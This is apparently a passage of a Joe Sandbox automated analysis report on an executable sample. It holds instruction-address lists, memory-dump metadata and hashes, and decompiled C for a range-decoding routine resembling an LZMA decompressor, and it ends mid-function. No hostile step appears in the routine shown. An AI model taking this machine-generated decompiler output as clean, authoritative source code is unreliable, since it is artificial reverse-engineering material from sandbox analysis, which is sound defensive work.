                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x00000000
                                                  0x004073c8
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00407489
                                                  0x00407489
                                                  0x00000000
                                                  0x00407489
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  0x00407468
                                                  0x004073ac
                                                  0x004073ac
                                                  0x004073af
                                                  0x00000000
                                                  0x00000000
                                                  0x00407543
                                                  0x00407546
                                                  0x00000000
                                                  0x00000000
                                                  0x0040717d
                                                  0x0040717f
                                                  0x00407186
                                                  0x00407187
                                                  0x00407189
                                                  0x0040718c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407194
                                                  0x00407197
                                                  0x0040719a
                                                  0x0040719c
                                                  0x0040719e
                                                  0x0040719e
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a9
                                                  0x004071ac
                                                  0x004071ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00407490
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040749f
                                                  0x0040749f
                                                  0x004074a3
                                                  0x004075db
                                                  0x00000000
                                                  0x004075db
                                                  0x004074a9
                                                  0x004074ac
                                                  0x004074af
                                                  0x004074b3
                                                  0x004074b6
                                                  0x004074bc
                                                  0x004074be
                                                  0x004074be
                                                  0x004074be
                                                  0x004074c1
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c7
                                                  0x004074c7
                                                  0x004074cb
                                                  0x0040752b
                                                  0x0040752e
                                                  0x00407533
                                                  0x00407534
                                                  0x00407536
                                                  0x00407538
                                                  0x0040753b
                                                  0x00000000
                                                  0x0040753b
                                                  0x004074cd
                                                  0x004074d3
                                                  0x004074d6
                                                  0x004074d9
                                                  0x004074dc
                                                  0x004074df
                                                  0x004074e2
                                                  0x004074e5
                                                  0x004074e8
                                                  0x004074eb
                                                  0x004074ee
                                                  0x00407507
                                                  0x0040750a
                                                  0x0040750d
                                                  0x00407510
                                                  0x00407514
                                                  0x00407516
                                                  0x00407516
                                                  0x00407517
                                                  0x0040751a
                                                  0x004074f0
                                                  0x004074f0
                                                  0x004074f8
                                                  0x004074fd
                                                  0x004074ff
                                                  0x00407502
                                                  0x00407502
                                                  0x0040751d
                                                  0x00407524
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x004071c2
                                                  0x004071c5
                                                  0x004071fb
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732e
                                                  0x0040732e
                                                  0x00407331
                                                  0x00407333
                                                  0x004075bd
                                                  0x00000000
                                                  0x004075bd
                                                  0x00407339
                                                  0x0040733c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407342
                                                  0x00407346
                                                  0x00407349
                                                  0x00407349
                                                  0x00407349
                                                  0x00000000
                                                  0x00407349
                                                  0x004071c7
                                                  0x004071c9
                                                  0x004071cb
                                                  0x004071cd
                                                  0x004071d0
                                                  0x004071d1
                                                  0x004071d3
                                                  0x004071d5
                                                  0x004071d8
                                                  0x004071db
                                                  0x004071f1
                                                  0x004071f6
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x0040725e
                                                  0x00407260
                                                  0x00407267
                                                  0x0040726a
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407272
                                                  0x00407272
                                                  0x00407274
                                                  0x00407277
                                                  0x0040727e
                                                  0x00407281
                                                  0x004072ae
                                                  0x004072ae
                                                  0x004072b1
                                                  0x004072b4
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00000000
                                                  0x00407328
                                                  0x004072b6
                                                  0x004072bc
                                                  0x004072bf
                                                  0x004072c2
                                                  0x004072c5
                                                  0x004072c8
                                                  0x004072cb
                                                  0x004072ce
                                                  0x004072d1
                                                  0x004072d4
                                                  0x004072d7
                                                  0x004072f0
                                                  0x004072f2
                                                  0x004072f5
                                                  0x004072f6
                                                  0x004072f9
                                                  0x004072fb
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407305
                                                  0x00407307
                                                  0x0040730a
                                                  0x0040730e
                                                  0x00407310
                                                  0x00407310
                                                  0x00407311
                                                  0x00407314
                                                  0x00407317
                                                  0x004072d9
                                                  0x004072d9
                                                  0x004072e1
                                                  0x004072e6
                                                  0x004072e8
                                                  0x004072eb
                                                  0x004072eb
                                                  0x0040731a
                                                  0x00407321
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x00000000
                                                  0x00407323
                                                  0x00000000
                                                  0x00407323
                                                  0x00407321
                                                  0x00407234
                                                  0x00407237
                                                  0x00407239
                                                  0x0040723c
                                                  0x0040723f
                                                  0x00407242
                                                  0x00407244
                                                  0x00407247
                                                  0x0040724a
                                                  0x0040724a
                                                  0x0040724d
                                                  0x0040724d
                                                  0x00407250
                                                  0x00407257
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407259
                                                  0x00000000
                                                  0x00407259
                                                  0x00407257
                                                  0x004071dd
                                                  0x004071e0
                                                  0x004071e2
                                                  0x004071e5
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f44
                                                  0x00406f44
                                                  0x00406f48
                                                  0x0040758d
                                                  0x00000000
                                                  0x0040758d
                                                  0x00406f4e
                                                  0x00406f51
                                                  0x00406f54
                                                  0x00406f57
                                                  0x00406f5a
                                                  0x00406f5d
                                                  0x00406f60
                                                  0x00406f62
                                                  0x00406f65
                                                  0x00406f68
                                                  0x00406f6b
                                                  0x00406f6d
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                  • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                  • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                  • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E00406BB0(void* __ecx) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				signed int _v16;
                                                  				unsigned int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				signed int _v48;
                                                  				signed int _v52;
                                                  				signed int _v56;
                                                  				signed int _v60;
                                                  				signed int _v64;
                                                  				signed int _v68;
                                                  				signed int _v72;
                                                  				signed int _v76;
                                                  				signed int _v80;
                                                  				signed int _v84;
                                                  				signed int _v88;
                                                  				signed int _v92;
                                                  				signed int _v95;
                                                  				signed int _v96;
                                                  				signed int _v100;
                                                  				signed int _v104;
                                                  				signed int _v108;
                                                  				signed int _v112;
                                                  				signed int _v116;
                                                  				signed int _v120;
                                                  				intOrPtr _v124;
                                                  				signed int _v128;
                                                  				signed int _v132;
                                                  				signed int _v136;
                                                  				void _v140;
                                                  				void* _v148;
                                                  				signed int _t537;
                                                  				signed int _t538;
                                                  				signed int _t572;
                                                  
                                                  				_t572 = 0x22;
                                                  				_v148 = __ecx;
                                                  				memcpy( &_v140, __ecx, _t572 << 2);
                                                  				if(_v52 == 0xffffffff) {
                                                  					return 1;
                                                  				}
                                                  				while(1) {
                                                  					L3:
                                                  					_t537 = _v140;
                                                  					if(_t537 > 0x1c) {
                                                  						break;
                                                  					}
                                                  					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                                  						case 0:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								goto L173;
                                                  							}
                                                  							_v112 = _v112 - 1;
                                                  							_v116 = _v116 + 1;
                                                  							_t537 =  *_v116;
                                                  							__eflags = _t537 - 0xe1;
                                                  							if(_t537 > 0xe1) {
                                                  								goto L174;
                                                  							}
                                                  							_t542 = _t537 & 0x000000ff;
                                                  							_push(0x2d);
                                                  							asm("cdq");
                                                  							_pop(_t576);
                                                  							_push(9);
                                                  							_pop(_t577);
                                                  							_t622 = _t542 / _t576;
                                                  							_t544 = _t542 % _t576 & 0x000000ff;
                                                  							asm("cdq");
                                                  							_t617 = _t544 % _t577 & 0x000000ff;
                                                  							_v64 = _t617;
                                                  							_v32 = (1 << _t622) - 1;
                                                  							_v28 = (1 << _t544 / _t577) - 1;
                                                  							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                  							__eflags = 0x600 - _v124;
                                                  							if(0x600 == _v124) {
                                                  								L12:
                                                  								__eflags = _t625;
                                                  								if(_t625 == 0) {
                                                  									L14:
                                                  									_v76 = _v76 & 0x00000000;
                                                  									_v68 = _v68 & 0x00000000;
                                                  									goto L17;
                                                  								} else {
                                                  									goto L13;
                                                  								}
                                                  								do {
                                                  									L13:
                                                  									_t625 = _t625 - 1;
                                                  									__eflags = _t625;
                                                  									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                  								} while (_t625 != 0);
                                                  								goto L14;
                                                  							}
                                                  							__eflags = _v8;
                                                  							if(_v8 != 0) {
                                                  								GlobalFree(_v8);
                                                  							}
                                                  							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                  							__eflags = _t537;
                                                  							_v8 = _t537;
                                                  							if(_t537 == 0) {
                                                  								goto L174;
                                                  							} else {
                                                  								_v124 = 0x600;
                                                  								goto L12;
                                                  							}
                                                  						case 1:
                                                  							L15:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 1;
                                                  								goto L173;
                                                  							}
                                                  							_v112 = _v112 - 1;
                                                  							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                  							_v116 = _v116 + 1;
                                                  							_t50 =  &_v76;
                                                  							 *_t50 = _v76 + 1;
                                                  							__eflags =  *_t50;
                                                  							L17:
                                                  							__eflags = _v76 - 4;
                                                  							if(_v76 < 4) {
                                                  								goto L15;
                                                  							}
                                                  							_t550 = _v68;
                                                  							__eflags = _t550 - _v120;
                                                  							if(_t550 == _v120) {
                                                  								L22:
                                                  								_v76 = 5;
                                                  								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                  								goto L25;
                                                  							}
                                                  							__eflags = _v12;
                                                  							_v120 = _t550;
                                                  							if(_v12 != 0) {
                                                  								GlobalFree(_v12);
                                                  							}
                                                  							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                  							__eflags = _t537;
                                                  							_v12 = _t537;
                                                  							if(_t537 == 0) {
                                                  								goto L174;
                                                  							} else {
                                                  								goto L22;
                                                  							}
                                                  						case 2:
                                                  							L26:
                                                  							_t557 = _v100 & _v32;
                                                  							_v136 = 6;
                                                  							_v80 = _t557;
                                                  							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                  							goto L135;
                                                  						case 3:
                                                  							L23:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 3;
                                                  								goto L173;
                                                  							}
                                                  							_v112 = _v112 - 1;
                                                  							_t72 =  &_v116;
                                                  							 *_t72 = _v116 + 1;
                                                  							__eflags =  *_t72;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							L25:
                                                  							_v76 = _v76 - 1;
                                                  							__eflags = _v76;
                                                  							if(_v76 != 0) {
                                                  								goto L23;
                                                  							}
                                                  							goto L26;
                                                  						case 4:
                                                  							L136:
                                                  							_t559 =  *_t626;
                                                  							_t610 = _t559 & 0x0000ffff;
                                                  							_t591 = (_v20 >> 0xb) * _t610;
                                                  							__eflags = _v16 - _t591;
                                                  							if(_v16 >= _t591) {
                                                  								_v20 = _v20 - _t591;
                                                  								_v16 = _v16 - _t591;
                                                  								_v68 = 1;
                                                  								_t560 = _t559 - (_t559 >> 5);
                                                  								__eflags = _t560;
                                                  								 *_t626 = _t560;
                                                  							} else {
                                                  								_v20 = _t591;
                                                  								_v68 = _v68 & 0x00000000;
                                                  								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                  							}
                                                  							__eflags = _v20 - 0x1000000;
                                                  							if(_v20 >= 0x1000000) {
                                                  								goto L142;
                                                  							} else {
                                                  								goto L140;
                                                  							}
                                                  						case 5:
                                                  							L140:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 5;
                                                  								goto L173;
                                                  							}
                                                  							_v20 = _v20 << 8;
                                                  							_v112 = _v112 - 1;
                                                  							_t464 =  &_v116;
                                                  							 *_t464 = _v116 + 1;
                                                  							__eflags =  *_t464;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							L142:
                                                  							_t561 = _v136;
                                                  							goto L143;
                                                  						case 6:
                                                  							__edx = 0;
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								__eax = _v8;
                                                  								__ecx = _v60;
                                                  								_v56 = 1;
                                                  								_v136 = 7;
                                                  								__esi = _v8 + 0x180 + _v60 * 2;
                                                  								goto L135;
                                                  							}
                                                  							__eax = _v96 & 0x000000ff;
                                                  							__esi = _v100;
                                                  							__cl = 8;
                                                  							__cl = 8 - _v64;
                                                  							__esi = _v100 & _v28;
                                                  							__eax = (_v96 & 0x000000ff) >> 8;
                                                  							__ecx = _v64;
                                                  							__esi = (_v100 & _v28) << 8;
                                                  							__ecx = _v8;
                                                  							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                  							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                  							__eflags = _v60 - 4;
                                                  							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                  							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                  							if(_v60 >= 4) {
                                                  								__eflags = _v60 - 0xa;
                                                  								if(_v60 >= 0xa) {
                                                  									_t103 =  &_v60;
                                                  									 *_t103 = _v60 - 6;
                                                  									__eflags =  *_t103;
                                                  								} else {
                                                  									_v60 = _v60 - 3;
                                                  								}
                                                  							} else {
                                                  								_v60 = 0;
                                                  							}
                                                  							__eflags = _v56 - __edx;
                                                  							if(_v56 == __edx) {
                                                  								__ebx = 0;
                                                  								__ebx = 1;
                                                  								goto L63;
                                                  							}
                                                  							__eax = _v24;
                                                  							__eax = _v24 - _v48;
                                                  							__eflags = __eax - _v120;
                                                  							if(__eax >= _v120) {
                                                  								__eax = __eax + _v120;
                                                  								__eflags = __eax;
                                                  							}
                                                  							__ecx = _v12;
                                                  							__ebx = 0;
                                                  							__ebx = 1;
                                                  							__al =  *((intOrPtr*)(__eax + __ecx));
                                                  							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                  							goto L43;
                                                  						case 7:
                                                  							__eflags = _v68 - 1;
                                                  							if(_v68 != 1) {
                                                  								__eax = _v40;
                                                  								_v132 = 0x16;
                                                  								_v36 = _v40;
                                                  								__eax = _v44;
                                                  								_v40 = _v44;
                                                  								__eax = _v48;
                                                  								_v44 = _v48;
                                                  								__eax = 0;
                                                  								__eflags = _v60 - 7;
                                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  								__al = __al & 0x000000fd;
                                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                                  								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                  								__eax = _v8;
                                                  								__eax = _v8 + 0x664;
                                                  								__eflags = __eax;
                                                  								_v92 = __eax;
                                                  								goto L71;
                                                  							}
                                                  							__eax = _v8;
                                                  							__ecx = _v60;
                                                  							_v136 = 8;
                                                  							__esi = _v8 + 0x198 + _v60 * 2;
                                                  							goto L135;
                                                  						case 8:
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								__eax = _v8;
                                                  								__ecx = _v60;
                                                  								_v136 = 0xa;
                                                  								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                  							} else {
                                                  								__eax = _v60;
                                                  								__ecx = _v8;
                                                  								__eax = _v60 + 0xf;
                                                  								_v136 = 9;
                                                  								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                  								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                  							}
                                                  							goto L135;
                                                  						case 9:
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								goto L92;
                                                  							}
                                                  							__eflags = _v100;
                                                  							if(_v100 == 0) {
                                                  								goto L174;
                                                  							}
                                                  							__eax = 0;
                                                  							__eflags = _v60 - 7;
                                                  							_t264 = _v60 - 7 >= 0;
                                                  							__eflags = _t264;
                                                  							0 | _t264 = _t264 + _t264 + 9;
                                                  							_v60 = _t264 + _t264 + 9;
                                                  							goto L78;
                                                  						case 0xa:
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								__eax = _v8;
                                                  								__ecx = _v60;
                                                  								_v136 = 0xb;
                                                  								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                  								goto L135;
                                                  							}
                                                  							__eax = _v44;
                                                  							goto L91;
                                                  						case 0xb:
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								__ecx = _v40;
                                                  								__eax = _v36;
                                                  								_v36 = _v40;
                                                  							} else {
                                                  								__eax = _v40;
                                                  							}
                                                  							__ecx = _v44;
                                                  							_v40 = _v44;
                                                  							L91:
                                                  							__ecx = _v48;
                                                  							_v48 = __eax;
                                                  							_v44 = _v48;
                                                  							L92:
                                                  							__eax = _v8;
                                                  							_v132 = 0x15;
                                                  							__eax = _v8 + 0xa68;
                                                  							_v92 = _v8 + 0xa68;
                                                  							goto L71;
                                                  						case 0xc:
                                                  							L102:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 0xc;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v116;
                                                  							__eax = _v16;
                                                  							_v20 = _v20 << 8;
                                                  							__ecx =  *_v116 & 0x000000ff;
                                                  							_v112 = _v112 - 1;
                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							_t340 =  &_v116;
                                                  							 *_t340 = _v116 + 1;
                                                  							__eflags =  *_t340;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							__eax = _v48;
                                                  							goto L104;
                                                  						case 0xd:
                                                  							L39:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 0xd;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v116;
                                                  							__eax = _v16;
                                                  							_v20 = _v20 << 8;
                                                  							__ecx =  *_v116 & 0x000000ff;
                                                  							_v112 = _v112 - 1;
                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							_t127 =  &_v116;
                                                  							 *_t127 = _v116 + 1;
                                                  							__eflags =  *_t127;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							L41:
                                                  							__eax = _v68;
                                                  							__eflags = _v76 - _v68;
                                                  							if(_v76 != _v68) {
                                                  								goto L50;
                                                  							}
                                                  							__eflags = __ebx - 0x100;
                                                  							if(__ebx >= 0x100) {
                                                  								goto L56;
                                                  							}
                                                  							L43:
                                                  							__eax = _v95 & 0x000000ff;
                                                  							_v95 = _v95 << 1;
                                                  							__ecx = _v92;
                                                  							__eax = (_v95 & 0x000000ff) >> 7;
                                                  							_v76 = __eax;
                                                  							__eax = __eax + 1;
                                                  							__eax = __eax << 8;
                                                  							__eax = __eax + __ebx;
                                                  							__esi = _v92 + __eax * 2;
                                                  							_v20 = _v20 >> 0xb;
                                                  							__ax =  *__esi;
                                                  							_v88 = __esi;
                                                  							__edx = __ax & 0x0000ffff;
                                                  							__ecx = (_v20 >> 0xb) * __edx;
                                                  							__eflags = _v16 - __ecx;
                                                  							if(_v16 >= __ecx) {
                                                  								_v20 = _v20 - __ecx;
                                                  								_v16 = _v16 - __ecx;
                                                  								__cx = __ax;
                                                  								_v68 = 1;
                                                  								__cx = __ax >> 5;
                                                  								__eflags = __eax;
                                                  								__ebx = __ebx + __ebx + 1;
                                                  								 *__esi = __ax;
                                                  							} else {
                                                  								_v68 = _v68 & 0x00000000;
                                                  								_v20 = __ecx;
                                                  								0x800 = 0x800 - __edx;
                                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  								__ebx = __ebx + __ebx;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags = _v20 - 0x1000000;
                                                  							_v72 = __ebx;
                                                  							if(_v20 >= 0x1000000) {
                                                  								goto L41;
                                                  							} else {
                                                  								goto L39;
                                                  							}
                                                  						case 0xe:
                                                  							L48:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 0xe;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v116;
                                                  							__eax = _v16;
                                                  							_v20 = _v20 << 8;
                                                  							__ecx =  *_v116 & 0x000000ff;
                                                  							_v112 = _v112 - 1;
                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							_t161 =  &_v116;
                                                  							 *_t161 = _v116 + 1;
                                                  							__eflags =  *_t161;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							while(1) {
                                                  								L50:
                                                  								__eflags = __ebx - 0x100;
                                                  								if(__ebx >= 0x100) {
                                                  									break;
                                                  								}
                                                  								__eax = _v92;
                                                  								__edx = __ebx + __ebx;
                                                  								__ecx = _v20;
                                                  								__esi = __edx + __eax;
                                                  								__ecx = _v20 >> 0xb;
                                                  								__ax =  *__esi;
                                                  								_v88 = __esi;
                                                  								__edi = __ax & 0x0000ffff;
                                                  								__ecx = (_v20 >> 0xb) * __edi;
                                                  								__eflags = _v16 - __ecx;
                                                  								if(_v16 >= __ecx) {
                                                  									_v20 = _v20 - __ecx;
                                                  									_v16 = _v16 - __ecx;
                                                  									__cx = __ax;
                                                  									_t175 = __edx + 1; // 0x1
                                                  									__ebx = _t175;
                                                  									__cx = __ax >> 5;
                                                  									__eflags = __eax;
                                                  									 *__esi = __ax;
                                                  								} else {
                                                  									_v20 = __ecx;
                                                  									0x800 = 0x800 - __edi;
                                                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  									__ebx = __ebx + __ebx;
                                                  									 *__esi = __cx;
                                                  								}
                                                  								__eflags = _v20 - 0x1000000;
                                                  								_v72 = __ebx;
                                                  								if(_v20 >= 0x1000000) {
                                                  									continue;
                                                  								} else {
                                                  									goto L48;
                                                  								}
                                                  							}
                                                  							L56:
                                                  							_t178 =  &_v56;
                                                  							 *_t178 = _v56 & 0x00000000;
                                                  							__eflags =  *_t178;
                                                  							goto L57;
                                                  						case 0xf:
                                                  							L60:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 0xf;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v116;
                                                  							__eax = _v16;
                                                  							_v20 = _v20 << 8;
                                                  							__ecx =  *_v116 & 0x000000ff;
                                                  							_v112 = _v112 - 1;
                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							_t208 =  &_v116;
                                                  							 *_t208 = _v116 + 1;
                                                  							__eflags =  *_t208;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							L62:
                                                  							__eflags = __ebx - 0x100;
                                                  							if(__ebx >= 0x100) {
                                                  								L57:
                                                  								__al = _v72;
                                                  								_v96 = _v72;
                                                  								goto L58;
                                                  							}
                                                  							L63:
                                                  							__eax = _v92;
                                                  							__edx = __ebx + __ebx;
                                                  							__ecx = _v20;
                                                  							__esi = __edx + __eax;
                                                  							__ecx = _v20 >> 0xb;
                                                  							__ax =  *__esi;
                                                  							_v88 = __esi;
                                                  							__edi = __ax & 0x0000ffff;
                                                  							__ecx = (_v20 >> 0xb) * __edi;
                                                  							__eflags = _v16 - __ecx;
                                                  							if(_v16 >= __ecx) {
                                                  								_v20 = _v20 - __ecx;
                                                  								_v16 = _v16 - __ecx;
                                                  								__cx = __ax;
                                                  								_t222 = __edx + 1; // 0x1
                                                  								__ebx = _t222;
                                                  								__cx = __ax >> 5;
                                                  								__eflags = __eax;
                                                  								 *__esi = __ax;
                                                  							} else {
                                                  								_v20 = __ecx;
                                                  								0x800 = 0x800 - __edi;
                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  								__ebx = __ebx + __ebx;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags = _v20 - 0x1000000;
                                                  							_v72 = __ebx;
                                                  							if(_v20 >= 0x1000000) {
                                                  								goto L62;
                                                  							} else {
                                                  								goto L60;
                                                  							}
                                                  						case 0x10:
                                                  							L112:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 0x10;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v116;
                                                  							__eax = _v16;
                                                  							_v20 = _v20 << 8;
                                                  							__ecx =  *_v116 & 0x000000ff;
                                                  							_v112 = _v112 - 1;
                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							_t371 =  &_v116;
                                                  							 *_t371 = _v116 + 1;
                                                  							__eflags =  *_t371;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							goto L114;
                                                  						case 0x11:
                                                  							L71:
                                                  							__esi = _v92;
                                                  							_v136 = 0x12;
                                                  							goto L135;
                                                  						case 0x12:
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								__eax = _v92;
                                                  								_v136 = 0x13;
                                                  								__esi = _v92 + 2;
                                                  								L135:
                                                  								_v88 = _t626;
                                                  								goto L136;
                                                  							}
                                                  							__eax = _v80;
                                                  							_v52 = _v52 & 0x00000000;
                                                  							__ecx = _v92;
                                                  							__eax = _v80 << 4;
                                                  							__eflags = __eax;
                                                  							__eax = _v92 + __eax + 4;
                                                  							goto L133;
                                                  						case 0x13:
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								_t475 =  &_v92;
                                                  								 *_t475 = _v92 + 0x204;
                                                  								__eflags =  *_t475;
                                                  								_v52 = 0x10;
                                                  								_v68 = 8;
                                                  								L147:
                                                  								_v128 = 0x14;
                                                  								goto L148;
                                                  							}
                                                  							__eax = _v80;
                                                  							__ecx = _v92;
